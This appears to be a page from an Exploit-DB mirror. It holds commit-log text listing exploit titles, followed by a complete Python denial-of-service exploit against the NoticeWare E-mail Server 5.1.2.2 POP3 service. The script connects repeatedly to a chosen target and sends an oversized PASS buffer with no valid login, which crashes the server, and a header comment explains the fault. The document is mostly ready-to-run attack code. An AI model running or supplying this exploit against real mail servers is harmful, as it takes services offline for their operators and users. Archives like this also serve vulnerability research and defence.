exploit-db-mirror/platforms/windows/dos/6719.py
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

76 lines
3.3 KiB
Python
Executable file

#!/usr/bin/python
#################################################################################
# Software: NoticeWare E-mail Sever (POP3) 5.1.2.2 Pre-Auth DoS #
# Discovered and Coded by: Paul Hand aka rAWjAW #
# Blog: http://rawjaw-security.blogspot.com #
# E-mail: phand3754<at>gmail<dot>com #
# #
# Description: NoticeWare E-mail Server has many odd querks about it #
# This DoS leverages the fact that the POP3 server can only handle #
# so many exceptions before you get an access violation at 0x00000008 #
# which is given from an EDX+8 where EDX is 0x00000000. #
# I've tried many things to get code execution and non are prevalent. #
# If you fuzz almost any of the commands for the POP3 server you will get it to #
# crash. Also, if you are authenticated and do "LIST 0.5" (numerous times) you #
# will get the same access violation you do with this DoS. #
# #
#Company Contact Date: 10-3-08 (But still no response) #
#################################################################################
import socket
import sys
from optparse import OptionParser
usage = "%prog -T <Target_IP> -P <Target_Port>"
parser = OptionParser(usage=usage)
parser.add_option("-T", "--target_IP", type="string",
action="store", dest="IP", help="Target IP Address")
parser.add_option("-P", "--target_Port", type="int",
action="store", dest="PORT", help="Target Port Address (usually 110)")
(options, args) = parser.parse_args()
IP=options.IP
PORT=options.PORT
if not (IP and PORT):
parser.print_help()
sys.exit(0)
buffer='\x42'*1000
print "########################################################"
print "# NoticeWare Email DoS #"
print "# Written by: Paul Hand aka rAWjAW #"
print "# #"
print "# NOTE: The program does not seem to always crash at #"
print "# the same point for some reason so if the script #"
print "# hangs because of a \"faulty\" closed connection just #"
print "# just CTRL+C and that means the POP3 server has been #"
print "# successfully DoSed. The program will still \"allow\" #"
print "# connections but they will just hang and cannot be #"
print "# used. #"
print "########################################################"
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((IP,PORT))
s.close()
except socket.error, message:
print "Could not make initial connection. Quitting"
sys.exit(0)
print "Connection to the target successful"
print "Sending buffers..."
x=1
while x < 50:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((IP,PORT))
s.recv(1024)
#You DO NOT need a vaild username
s.send('USER admin\r\n')
s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
s.recv(1024)
s.close()
x=x+1
print "DoS Successful!"
# milw0rm.com [2008-10-10]